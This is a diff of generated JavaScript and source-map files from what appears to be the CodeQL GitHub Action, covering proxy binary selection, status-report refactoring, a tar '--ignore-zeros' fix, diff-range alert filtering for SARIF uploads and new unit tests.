{"version":3,"file":"start-proxy-action-post.js","sourceRoot":"","sources":["../src/start-proxy-action-post.ts"],"names":[],"mappings":";;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;AAAA;;;;GAIG;AACH,oDAAsC;AAEtC,4DAA8C;AAC9C,6CAAgD;AAChD,4DAA8C;AAC9C,uDAA8D;AAC9D,uCAA6C;AAC7C,iCAAoE;AAEpE,KAAK,UAAU,UAAU;IACvB,MAAM,MAAM,GAAG,IAAA,0BAAgB,GAAE,CAAC;IAElC,IAAI,CAAC;QACH,4CAA4C;QAC5C,WAAW,CAAC,aAAa,EAAE,CAAC;QAE5B,yBAAyB;QACzB,MAAM,GAAG,GAAG,IAAI,CAAC,QAAQ,CAAC,mBAAmB,CAAC,CAAC;QAC/C,IAAI,GAAG,EAAE,CAAC;YACR,IAAI,CAAC;gBACH,OAAO,CAAC,IAAI,CAAC,MAAM,CAAC,GAAG,CAAC,CAAC,CAAC;YAC5B,CAAC;YAAC,OAAO,KAAK,EAAE,CAAC;gBACf,MAAM,CAAC,KAAK,CAAC,iCAAiC,IAAA,sBAAe,EAAC,KAAK,CAAC,EAAE,CAAC,CAAC;YAC1E,CAAC;QACH,CAAC;QAED,MAAM,MAAM,GAAG,MAAM,WAAW,CAAC,SAAS,CACxC,WAAW,CAAC,qBAAqB,EAAE,EACnC,MAAM,CACP,CAAC;QAEF,IAAI,CAAC,MAAM,IAAI,MAAM,CAAC,SAAS,CAAC,IAAI,IAAI,CAAC,OAAO,EAAE,EAAE,CAAC;YACnD,MAAM,WAAW,GAAG,IAAI,CAAC,QAAQ,CAAC,gBAAgB,CAAC,CAAC;YACpD,MAAM,CAAC,IAAI,CACT,wEAAwE,CACzE,CAAC;YACF,IAAI,MAAM,EAAE,aAAa,CAAC,IAAI,KAAK,SAAS,EAAE,CAAC;gBAC7C,MAAM,CAAC,OAAO,CACZ,qFAAqF,CACtF,CAAC;gBACF,OAAO;YACT,CAAC;YACD,MAAM,aAAa,GAAG,MAAM,IAAA,6BAAgB,GAAE,CAAC;YAC/C,IAAA,gCAAyB,EAAC,aAAa,EAAE,MAAM,CAAC,CAAC;YAEjD,MAAM,gBAAgB,GAAG,MAAM,IAAA,2CAAyB,EACtD,MAAM,EACN,aAAa,CAAC,IAAI,CACnB,CAAC;YAEF,MAAM,gBAAgB,CAAC,cAAc,CACnC,gBAAgB,EAChB,CAAC,WAAW,CAAC,EACb,WAAW,CAAC,qBAAqB,EAAE,EACnC;gBACE,wFAAwF;gBACxF,aAAa,EAAE,CAAC;aACjB,CACF,CAAC;QACJ,CAAC;IACH,CAAC;IAAC,OAAO,KAAK,EAAE,CAAC;QACf,gEAAgE;QAChE,MAAM,CAAC,OAAO,CACZ,wCAAwC,IAAA,sBAAe,EAAC,KAAK,CAAC,EAAE,CACjE,CAAC;IACJ,CAAC;AACH,CAAC;AAED,KAAK,UAAU,EAAE,CAAC"}
lib/start-proxy-action.js (generated, 7 lines changed)
@@ -43,8 +43,8 @@ const logging_1 = require("./logging");
 const start_proxy_1 = require("./start-proxy");
 const util = __importStar(require("./util"));
 const UPDATEJOB_PROXY = "update-job-proxy";
-const UPDATEJOB_PROXY_VERSION = "v2.0.20241023203727";
-const UPDATEJOB_PROXY_URL_PREFIX = "https://github.com/github/codeql-action/releases/download/codeql-bundle-v2.18.1/";
+const UPDATEJOB_PROXY_VERSION = "v2.0.20250424171100";
+const UPDATEJOB_PROXY_URL_PREFIX = "https://github.com/github/codeql-action/releases/download/codeql-bundle-v2.21.1/";
 const KEY_SIZE = 2048;
 const KEY_EXPIRY_YEARS = 2;
 const CERT_SUBJECT = [
@@ -112,7 +112,8 @@ async function runWrapper() {
         ca,
     };
     // Start the Proxy
-    const proxyBin = await getProxyBinaryPath();
+    const proxyBin = actionsUtil.getOptionalInput("proxy_binary") ??
+        (await getProxyBinaryPath());
     await startProxy(proxyBin, proxyConfig, proxyLogFilePath, logger);
 }
 async function startProxy(binPath, config, logFilePath, logger) {
File diff suppressed because one or more lines are too long
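The second change lets a proxy_binary input override the downloaded proxy: the ?? operator falls through to getProxyBinaryPath() only when the input is null or undefined. A sketch of that fallback, where both helpers are simplified stand-ins for the real actionsUtil.getOptionalInput and getProxyBinaryPath:

// Sketch of the input-override fallback (helpers are simplified stand-ins).
const getOptionalInput = (name) =>
    process.env[`INPUT_${name.toUpperCase()}`] || undefined; // action inputs arrive as INPUT_* env vars
async function getProxyBinaryPath() {
    return "/opt/hostedtoolcache/update-job-proxy"; // invented download location
}

async function resolveProxyBin() {
    // An explicitly supplied path always wins; `??` only falls through on null/undefined.
    return getOptionalInput("proxy_binary") ?? (await getProxyBinaryPath());
}

resolveProxyBin().then(console.log);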
lib/status-report.js (generated, 15 lines changed)
@@ -35,6 +35,7 @@ var __importStar = (this && this.__importStar) || (function () {
 Object.defineProperty(exports, "__esModule", { value: true });
 exports.JobStatus = exports.ActionName = void 0;
 exports.isFirstPartyAnalysis = isFirstPartyAnalysis;
+exports.isThirdPartyAnalysis = isThirdPartyAnalysis;
 exports.getActionsStatus = getActionsStatus;
 exports.getJobStatusDisplayName = getJobStatusDisplayName;
 exports.createStatusReportBase = createStatusReportBase;
@@ -46,6 +47,7 @@ const api_client_1 = require("./api-client");
 const doc_url_1 = require("./doc-url");
 const environment_1 = require("./environment");
 const git_utils_1 = require("./git-utils");
+const repository_1 = require("./repository");
 const util_1 = require("./util");
 var ActionName;
 (function (ActionName) {
@@ -70,6 +72,12 @@ function isFirstPartyAnalysis(actionName) {
     }
     return process.env[environment_1.EnvVar.INIT_ACTION_HAS_RUN] === "true";
 }
+/**
+ * @returns true if the analysis is considered to be third party.
+ */
+function isThirdPartyAnalysis(actionName) {
+    return !isFirstPartyAnalysis(actionName);
+}
 /** Overall status of the entire job. String values match the Hydro schema. */
 var JobStatus;
 (function (JobStatus) {
@@ -248,13 +256,12 @@ async function sendStatusReport(statusReport) {
         core.debug("In test mode. Status reports are not uploaded.");
         return;
     }
-    const nwo = (0, util_1.getRequiredEnvParam)("GITHUB_REPOSITORY");
-    const [owner, repo] = nwo.split("/");
+    const nwo = (0, repository_1.getRepositoryNwo)();
     const client = (0, api_client_1.getApiClient)();
     try {
         await client.request("PUT /repos/:owner/:repo/code-scanning/analysis/status", {
-            owner,
-            repo,
+            owner: nwo.owner,
+            repo: nwo.repo,
             data: statusReportJSON,
         });
     }
File diff suppressed because one or more lines are too long
lib/status-report.test.js (generated, 10 lines changed)
@@ -109,4 +109,14 @@ function setupEnvironmentAndStub(tmpDir) {
     t.is((await (0, status_report_1.createStatusReportBase)(status_report_1.ActionName.Analyze, "failure", new Date("May 19, 2023 05:19:00"), (0, testing_utils_1.createTestConfig)({}), { numAvailableBytes: 100, numTotalBytes: 500 }, (0, logging_1.getRunnerLogger)(false), "failure cause", "exception stack trace"))?.first_party_analysis, true);
 });
 });
+(0, ava_1.default)("getActionStatus handling correctly various types of errors", (t) => {
+    t.is((0, status_report_1.getActionsStatus)(new Error("arbitrary error")), "failure", "We categorise an arbitrary error as a failure");
+    t.is((0, status_report_1.getActionsStatus)(new util_1.ConfigurationError("arbitrary error")), "user-error", "We categorise a ConfigurationError as a user error");
+    t.is((0, status_report_1.getActionsStatus)(new Error("exit code 1"), "multiple things went wrong"), "failure", "getActionsStatus should return failure if passed an arbitrary error and an additional failure cause");
+    t.is((0, status_report_1.getActionsStatus)(new util_1.ConfigurationError("exit code 1"), "multiple things went wrong"), "user-error", "getActionsStatus should return user-error if passed a configuration error and an additional failure cause");
+    t.is((0, status_report_1.getActionsStatus)(), "success", "getActionsStatus should return success if no error is passed");
+    t.is((0, status_report_1.getActionsStatus)(new Object()), "failure", "getActionsStatus should return failure if passed an arbitrary object");
+    t.is((0, status_report_1.getActionsStatus)(null, "an error occurred"), "failure", "getActionsStatus should return failure if passed null and an additional failure cause");
+    t.is((0, status_report_1.getActionsStatus)((0, util_1.wrapError)(new util_1.ConfigurationError("arbitrary error"))), "user-error", "We still recognise a wrapped ConfigurationError as a user error");
+});
 //# sourceMappingURL=status-report.test.js.map
File diff suppressed because one or more lines are too long
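The new test pins down getActionsStatus's categorisation: a ConfigurationError (even when wrapped) yields "user-error", any other truthy error or a bare failure cause yields "failure", and no error at all yields "success". A sketch of logic consistent with those assertions; ConfigurationError and wrapError here are simplified stand-ins, not the actual exports of ./util:

// Sketch consistent with the assertions above; stand-ins, not the action's code.
class ConfigurationError extends Error {}
const wrapError = (e) => (e instanceof Error ? e : new Error(String(e)));

function getActionsStatus(error, otherFailureCause) {
    if (error || otherFailureCause) {
        return error instanceof ConfigurationError ? "user-error" : "failure";
    }
    return "success";
}

console.log(getActionsStatus()); // "success"
console.log(getActionsStatus(new Error("exit code 1"), "multiple things went wrong")); // "failure"
console.log(getActionsStatus(new ConfigurationError("arbitrary error"))); // "user-error"
console.log(getActionsStatus(wrapError(new ConfigurationError("arbitrary error")))); // "user-error"
console.log(getActionsStatus(null, "an error occurred")); // "failure"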
lib/tar.js (generated, 11 lines changed)
@@ -143,7 +143,16 @@ async function extractTarZst(tar, dest, tarVersion, logger) {
: ""}`);
|
: ""}`);
|
||||||
try {
|
try {
|
||||||
// Initialize args
|
// Initialize args
|
||||||
const args = ["-x", "--zstd"];
|
//
|
||||||
|
// `--ignore-zeros` means that trailing zero bytes at the end of an archive will be read
|
||||||
|
// by `tar` in case a further concatenated archive follows. Otherwise when a tarball built
|
||||||
|
// by GNU tar, which writes many trailing zeroes, is read by BSD tar, which expects less, then
|
||||||
|
// BSD tar can hang up the pipe to its filter program early, and if that program is `zstd`
|
||||||
|
// then it will try to write the remaining zeroes, get an EPIPE error because `tar` has closed
|
||||||
|
// its end of the pipe, return 1, and `tar` will pass the error along.
|
||||||
|
//
|
||||||
|
// See also https://github.com/facebook/zstd/issues/4294
|
||||||
|
const args = ["-x", "--zstd", "--ignore-zeros"];
|
||||||
if (tarVersion.type === "gnu") {
|
if (tarVersion.type === "gnu") {
|
||||||
// Suppress warnings when using GNU tar to extract archives created by BSD tar
|
// Suppress warnings when using GNU tar to extract archives created by BSD tar
|
||||||
args.push("--warning=no-unknown-keyword");
|
args.push("--warning=no-unknown-keyword");
|
||||||
|
|||||||
File diff suppressed because one or more lines are too long
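The long comment above explains the GNU/BSD tar mismatch; the code change itself is a single extra flag in the argument vector handed to tar. A sketch of how the final command line is assembled (archive and destination paths invented; the real code pipes the args to a child process):

// Sketch of the tar invocation assembled above (paths invented).
const args = ["-x", "--zstd", "--ignore-zeros"]; // --ignore-zeros: tolerate GNU tar's trailing zero blocks
const tarVersion = { type: "gnu" }; // stand-in for the detected tar flavour
if (tarVersion.type === "gnu") {
    // Suppress warnings when using GNU tar to extract archives created by BSD tar
    args.push("--warning=no-unknown-keyword");
}
args.push("-f", "codeql-bundle.tar.zst", "-C", "/tmp/extracted"); // invented paths
console.log(["tar", ...args].join(" "));
// tar -x --zstd --ignore-zeros --warning=no-unknown-keyword -f codeql-bundle.tar.zst -C /tmp/extracted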
lib/upload-lib.js (generated, 66 lines changed)
@@ -44,6 +44,8 @@ exports.validateSarifFileSchema = validateSarifFileSchema;
 exports.buildPayload = buildPayload;
 exports.uploadFiles = uploadFiles;
 exports.waitForProcessing = waitForProcessing;
+exports.shouldConsiderConfigurationError = shouldConsiderConfigurationError;
+exports.shouldConsiderInvalidRequest = shouldConsiderInvalidRequest;
 exports.validateUniqueCategory = validateUniqueCategory;
 const fs = __importStar(require("fs"));
 const path = __importStar(require("path"));
@@ -58,6 +60,7 @@ const api = __importStar(require("./api-client"));
 const api_client_1 = require("./api-client");
 const codeql_1 = require("./codeql");
 const config_utils_1 = require("./config-utils");
+const diff_informed_analysis_utils_1 = require("./diff-informed-analysis-utils");
 const environment_1 = require("./environment");
 const fingerprints = __importStar(require("./fingerprints"));
 const gitUtils = __importStar(require("./git-utils"));
@@ -407,11 +410,20 @@ async function uploadFiles(sarifPath, checkoutPath, category, features, logger)
     logger.startGroup("Uploading results");
     logger.info(`Processing sarif files: ${JSON.stringify(sarifFiles)}`);
     const gitHubVersion = await (0, api_client_1.getGitHubVersion)();
-    // Validate that the files we were asked to upload are all valid SARIF files
-    for (const file of sarifFiles) {
-        validateSarifFileSchema(file, logger);
+    try {
+        // Validate that the files we were asked to upload are all valid SARIF files
+        for (const file of sarifFiles) {
+            validateSarifFileSchema(file, logger);
+        }
+    }
+    catch (e) {
+        if (e instanceof SyntaxError) {
+            throw new InvalidSarifUploadError(e.message);
+        }
+        throw e;
     }
     let sarif = await combineSarifFilesUsingCLI(sarifFiles, gitHubVersion, features, logger);
+    sarif = filterAlertsByDiffRange(logger, sarif);
     sarif = await fingerprints.addFingerprints(sarif, checkoutPath, logger);
     const analysisKey = await api.getAnalysisKey();
     const environment = actionsUtil.getRequiredInput("matrix");
@@ -433,7 +445,7 @@ async function uploadFiles(sarifPath, checkoutPath, category, features, logger)
     const numResultInSarif = countResultsInSarif(sarifPayload);
     logger.debug(`Number of results in upload: ${numResultInSarif}`);
     // Make the upload
-    const sarifID = await uploadPayload(payload, (0, repository_1.parseRepositoryNwo)(util.getRequiredEnvParam("GITHUB_REPOSITORY")), logger);
+    const sarifID = await uploadPayload(payload, (0, repository_1.getRepositoryNwo)(), logger);
     logger.endGroup();
     return {
         statusReport: {
@@ -522,9 +534,12 @@ async function waitForProcessing(repositoryNwo, sarifID, logger, options = {
  * Returns whether the provided processing errors are a configuration error.
  */
 function shouldConsiderConfigurationError(processingErrors) {
+    const expectedConfigErrors = [
+        "CodeQL analyses from advanced configurations cannot be processed when the default setup is enabled",
+        "rejecting delivery as the repository has too many logical alerts",
+    ];
     return (processingErrors.length === 1 &&
-        processingErrors[0] ===
-            "CodeQL analyses from advanced configurations cannot be processed when the default setup is enabled");
+        expectedConfigErrors.some((msg) => processingErrors[0].includes(msg)));
 }
 /**
  * Returns whether the provided processing errors are the result of an invalid SARIF upload request.
@@ -607,4 +622,43 @@ class InvalidSarifUploadError extends Error {
     }
 }
 exports.InvalidSarifUploadError = InvalidSarifUploadError;
+function filterAlertsByDiffRange(logger, sarif) {
+    const diffRanges = (0, diff_informed_analysis_utils_1.readDiffRangesJsonFile)(logger);
+    if (!diffRanges?.length) {
+        return sarif;
+    }
+    const checkoutPath = actionsUtil.getRequiredInput("checkout_path");
+    for (const run of sarif.runs) {
+        if (run.results) {
+            run.results = run.results.filter((result) => {
+                const locations = [
+                    ...(result.locations || []).map((loc) => loc.physicalLocation),
+                    ...(result.relatedLocations || []).map((loc) => loc.physicalLocation),
+                ];
+                return locations.some((physicalLocation) => {
+                    const locationUri = physicalLocation?.artifactLocation?.uri;
+                    const locationStartLine = physicalLocation?.region?.startLine;
+                    if (!locationUri || locationStartLine === undefined) {
+                        return false;
+                    }
+                    // CodeQL always uses forward slashes as the path separator, so on Windows we
+                    // need to replace any backslashes with forward slashes.
+                    const locationPath = path
+                        .join(checkoutPath, locationUri)
+                        .replaceAll(path.sep, "/");
+                    // Alert filtering here replicates the same behavior as the restrictAlertsTo
+                    // extensible predicate in CodeQL. See the restrictAlertsTo documentation
+                    // https://codeql.github.com/codeql-standard-libraries/csharp/codeql/util/AlertFiltering.qll/predicate.AlertFiltering$restrictAlertsTo.3.html
+                    // for more details, such as why the filtering applies only to the first line
+                    // of an alert location.
+                    return diffRanges.some((range) => range.path === locationPath &&
+                        ((range.startLine <= locationStartLine &&
+                            range.endLine >= locationStartLine) ||
+                            (range.startLine === 0 && range.endLine === 0)));
+                });
+            });
+        }
+    }
+    return sarif;
+}
 //# sourceMappingURL=upload-lib.js.map
File diff suppressed because one or more lines are too long
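The core of the new filterAlertsByDiffRange is its per-location predicate: an alert survives only if one of its locations falls inside a diff range for the same file, and a range with startLine 0 and endLine 0 acts as a whole-file wildcard. A standalone sketch of the predicate (paths and ranges invented):

// Standalone sketch of the diff-range predicate (paths/ranges invented).
const diffRanges = [
    { path: "/checkout/src/app.js", startLine: 10, endLine: 20 },
    { path: "/checkout/src/all.js", startLine: 0, endLine: 0 }, // 0/0 = whole file
];

function locationInDiff(locationPath, locationStartLine) {
    return diffRanges.some((range) => range.path === locationPath &&
        ((range.startLine <= locationStartLine &&
            range.endLine >= locationStartLine) ||
            (range.startLine === 0 && range.endLine === 0)));
}

console.log(locationInDiff("/checkout/src/app.js", 15)); // true: inside 10-20
console.log(locationInDiff("/checkout/src/app.js", 42)); // false: outside the range
console.log(locationInDiff("/checkout/src/all.js", 7)); // true: whole-file wildcard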
lib/upload-lib.test.js (generated, 35 lines changed)
@@ -244,6 +244,41 @@ ava_1.default.beforeEach(() => {
         type: util_1.GitHubVariant.DOTCOM,
     }));
 });
+(0, ava_1.default)("shouldConsiderConfigurationError correctly detects configuration errors", (t) => {
+    const error1 = [
+        "CodeQL analyses from advanced configurations cannot be processed when the default setup is enabled",
+    ];
+    t.true(uploadLib.shouldConsiderConfigurationError(error1));
+    const error2 = [
+        "rejecting delivery as the repository has too many logical alerts",
+    ];
+    t.true(uploadLib.shouldConsiderConfigurationError(error2));
+    // We fail cases where we get > 1 error messages back
+    const error3 = [
+        "rejecting delivery as the repository has too many alerts",
+        "extra error message",
+    ];
+    t.false(uploadLib.shouldConsiderConfigurationError(error3));
+});
+(0, ava_1.default)("shouldConsiderInvalidRequest returns correct recognises processing errors", (t) => {
+    const error1 = [
+        "rejecting SARIF",
+        "an invalid URI was provided as a SARIF location",
+    ];
+    t.true(uploadLib.shouldConsiderInvalidRequest(error1));
+    const error2 = [
+        "locationFromSarifResult: expected artifact location",
+        "an invalid URI was provided as a SARIF location",
+    ];
+    t.true(uploadLib.shouldConsiderInvalidRequest(error2));
+    // We expect ALL errors to be of processing errors, for the outcome to be classified as
+    // an invalid SARIF upload error.
+    const error3 = [
+        "could not convert rules: invalid security severity value, is not a number",
+        "an unknown error occurred",
+    ];
+    t.false(uploadLib.shouldConsiderInvalidRequest(error3));
+});
 function createMockSarif(id, tool) {
     return {
         runs: [
File diff suppressed because one or more lines are too long
lib/upload-sarif-action.js (generated, 6 lines changed)
@@ -61,7 +61,7 @@ async function run() {
     (0, util_1.checkActionVersion)((0, actions_util_1.getActionVersion)(), gitHubVersion);
     // Make inputs accessible in the `post` step.
     actionsUtil.persistInputs();
-    const repositoryNwo = (0, repository_1.parseRepositoryNwo)((0, util_1.getRequiredEnvParam)("GITHUB_REPOSITORY"));
+    const repositoryNwo = (0, repository_1.getRepositoryNwo)();
     const features = new feature_flags_1.Features(gitHubVersion, repositoryNwo, (0, actions_util_1.getTemporaryDirectory)(), logger);
     const startingStatusReportBase = await (0, status_report_1.createStatusReportBase)(status_report_1.ActionName.UploadSarif, "starting", startedAt, undefined, await (0, util_1.checkDiskUsage)(logger), logger);
     if (startingStatusReportBase !== undefined) {
@@ -75,12 +75,12 @@ async function run() {
             core.debug("In test mode. Waiting for processing is disabled.");
         }
         else if (actionsUtil.getRequiredInput("wait-for-processing") === "true") {
-            await upload_lib.waitForProcessing((0, repository_1.parseRepositoryNwo)((0, util_1.getRequiredEnvParam)("GITHUB_REPOSITORY")), uploadResult.sarifID, logger);
+            await upload_lib.waitForProcessing((0, repository_1.getRepositoryNwo)(), uploadResult.sarifID, logger);
         }
         await sendSuccessStatusReport(startedAt, uploadResult.statusReport, logger);
     }
     catch (unwrappedError) {
-        const error = !(0, status_report_1.isFirstPartyAnalysis)(status_report_1.ActionName.UploadSarif) &&
+        const error = (0, status_report_1.isThirdPartyAnalysis)(status_report_1.ActionName.UploadSarif) &&
             unwrappedError instanceof upload_lib.InvalidSarifUploadError
             ? new util_1.ConfigurationError(unwrappedError.message)
             : (0, util_1.wrapError)(unwrappedError);

lib/upload-sarif-action.js.map (generated)
@@ -1 +1 @@
{"version":3,"file":"upload-sarif-action.js","sourceRoot":"","sources":["../src/upload-sarif-action.ts"],"names":[],"mappings":"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"}
{"version":3,"file":"upload-sarif-action.js","sourceRoot":"","sources":["../src/upload-sarif-action.ts"],"names":[],"mappings":"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